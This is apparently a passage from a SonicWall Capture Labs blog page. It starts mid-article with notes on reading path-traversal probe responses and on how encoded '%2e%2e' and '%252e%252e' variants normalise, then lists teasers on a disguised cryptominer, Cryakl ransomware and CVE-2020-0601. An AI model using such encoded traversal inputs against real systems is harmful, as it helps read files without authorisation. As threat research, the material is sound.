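When triaging the output, the response code matters: a 200 on a traversal request means the appliance served the file behind the `..`, while a 404 suggests the probe was blocked or the path did not exist. Decoding before splitting is what lets the `%2e%2e` and `%252e%252e` variants collapse onto the same `resolved` value as the plain form.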
Posted: January 24, 2020
This week, the SonicWall Capture Labs Threat Research Team came across another cryptominer that pretends to be a media player and even loads a wav file to hide its real intent. Infection Cycle: This Trojan comes […]
Posted: January 17, 2020
The SonicWall Capture Labs Threat Research team has observed a newly released version of Cryakl ransomware. First seen in early 2014 spreading via email, Cryakl works like most ransomware by encrypting files and demanding a ransom […]
Posted: January 14, 2020
SonicWall protects its customers against the latest Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601